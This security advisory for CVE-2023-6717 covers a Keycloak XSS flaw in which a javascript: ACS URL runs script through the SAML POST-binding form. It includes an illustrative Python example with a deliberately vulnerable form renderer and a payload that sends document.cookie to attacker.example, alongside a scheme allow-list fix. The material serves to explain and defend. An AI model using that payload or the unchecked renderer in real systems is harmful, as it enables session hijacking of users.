CVE-2023-6717
Keycloak: XSS via Assertion Consumer Service URL in SAML POST-binding flow
A flaw was found in the SAML client registration in Keycloak: an administrator could register a javascript: URI as a client's Assertion Consumer Service (ACS) POST Binding URL, creating a Cross-Site Scripting (XSS) risk. In the SAML HTTP-POST binding, Keycloak sends the user an auto-submitting HTML form whose action is the registered ACS URL; when that URL is a javascript: URI, the script executes in the user's browser, in Keycloak's own context, as soon as the form is submitted. A malicious admin in one realm, or a client with registration access, could therefore target users of other realms or applications and run arbitrary JavaScript in their sessions. This can enable unauthorized access and other harmful actions, compromising the confidentiality, integrity, and availability of the whole Keycloak instance.
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
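The following Python is an added illustration, not code from Keycloak or from this advisory: it builds the auto-submitting form used by the SAML HTTP-POST binding once with the registered ACS URL trusted as-is (the vulnerable pattern) and once behind a scheme allow-list that rejects javascript:, data: and scheme-relative values before the form is rendered. Function names, the base64 "SAMLResponse" value and the attacker URL are constructed for the example.

```python
"""Added example (not Keycloak code): why a javascript: Assertion Consumer
Service URL turns the SAML POST binding into XSS, and the scheme check that
stops it.  All identifiers below are illustrative."""
from html import escape
from typing import Optional
from urllib.parse import urlsplit

# An ACS endpoint is an HTTP(S) URL.  Anything else (javascript:, data:,
# vbscript:, scheme-relative //host, empty) is rejected.
ALLOWED_SCHEMES = {"http", "https"}
# Characters browsers ignore when parsing a URL: tab/LF/CR anywhere in the
# string, and leading/trailing C0 control characters and space.
_IGNORED = "\t\r\n"
_TRIM = "".join(chr(c) for c in range(0x21))


def is_safe_acs_url(url: str) -> bool:
    """True only for an absolute http(s) URL that names a host.

    Normalise first: "  JaVaScRiPt:alert(1)" and "java\\tscript:alert(1)"
    both run as javascript: in a browser, although a naive
    startswith("javascript:") test would accept them.
    """
    if not isinstance(url, str):
        return False
    cleaned = "".join(ch for ch in url if ch not in _IGNORED).strip(_TRIM)
    parts = urlsplit(cleaned)
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def _form_html(acs_url: str, saml_response_b64: str,
               relay_state: Optional[str]) -> str:
    """Auto-submitting HTML form of the SAML HTTP-POST binding.

    Attribute values are HTML-escaped, but note that escaping is not a
    defence here: the browser decodes the attribute back before using it
    as the form action, so a javascript: URL survives escape() intact.
    """
    relay = ""
    if relay_state is not None:
        relay = ('<input type="hidden" name="RelayState" '
                 f'value="{escape(relay_state, quote=True)}">')
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="POST" action="{escape(acs_url, quote=True)}">'
        '<input type="hidden" name="SAMLResponse" '
        f'value="{escape(saml_response_b64, quote=True)}">'
        f'{relay}<noscript><input type="submit"></noscript>'
        '</form></body></html>'
    )


def render_post_binding_form_unchecked(acs_url: str, saml_response_b64: str,
                                       relay_state: Optional[str] = None) -> str:
    """Vulnerable pattern: trusts whatever ACS URL was stored for the client.
    With acs_url = "javascript:..." the onload submit navigates the user's
    browser to that URL and the script runs in the page's (IdP) origin."""
    return _form_html(acs_url, saml_response_b64, relay_state)


def render_post_binding_form(acs_url: str, saml_response_b64: str,
                             relay_state: Optional[str] = None) -> str:
    """Hardened: refuse to emit a form whose action is not http(s).
    The same check belongs on every path that stores an ACS URL (admin
    console, dynamic client registration, realm import) so that a
    javascript: value never reaches the database at all."""
    if not is_safe_acs_url(acs_url):
        raise ValueError(f"refusing non-http(s) ACS URL: {acs_url!r}")
    return _form_html(acs_url, saml_response_b64, relay_state)


if __name__ == "__main__":
    # Constructed placeholder, not a real assertion: base64 of "<samlp:Response/>".
    fake_response = "PHNhbWxwOlJlc3BvbnNlLz4="
    # Constructed attacker value of the kind the advisory describes.
    evil_acs = "javascript:fetch('https://attacker.example/?c='+document.cookie)"
    print(render_post_binding_form_unchecked(evil_acs, fake_response))
    try:
        render_post_binding_form(evil_acs, fake_response)
    except ValueError as exc:
        print("blocked:", exc)
```

Running the block prints the form a vulnerable flow would hand to the victim (its action is the javascript: URL, still executable after HTML escaping) and then the rejection raised by the checked variant. The essential point is the scheme allow-list applied to the stored value; output encoding alone does not close this class of bug.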
Affected products
keycloak
Red Hat · Migration Toolkit for Applications 6
Red Hat · Migration Toolkit for Applications 7
Red Hat · Red Hat AMQ Broker 7
Red Hat · Red Hat build of Apicurio Registry 2
Red Hat · Red Hat build of Keycloak 22
Red Hat · Red Hat build of Keycloak 22.0.10
Red Hat · Red Hat build of Quarkus
Red Hat · Red Hat Data Grid 8
Red Hat · Red Hat Decision Manager 7
Red Hat · Red Hat Developer Hub
Red Hat · Red Hat Fuse 7
Red Hat · Red Hat JBoss Data Grid 7
Red Hat · Red Hat JBoss Enterprise Application Platform 6
Red Hat · Red Hat JBoss Enterprise Application Platform 7
Red Hat · Red Hat JBoss Enterprise Application Platform 8
Red Hat · Red Hat JBoss Enterprise Application Platform Expansion Pack
Red Hat · Red Hat OpenShift GitOps
Red Hat · Red Hat Process Automation 7
Red Hat · Red Hat Single Sign-On 7
Red Hat · RHOSS-1.33-RHEL-8
Red Hat · RHPAM 7.13.5 async
References
https://access.redhat.com/errata/RHSA-2024:1353
https://access.redhat.com/errata/RHSA-2024:1867
https://access.redhat.com/errata/RHSA-2024:1868
https://access.redhat.com/errata/RHSA-2024:2945
https://access.redhat.com/errata/RHSA-2024:4057
https://access.redhat.com/security/cve/CVE-2023-6717
https://bugzilla.redhat.com/show_bug.cgi?id=2253952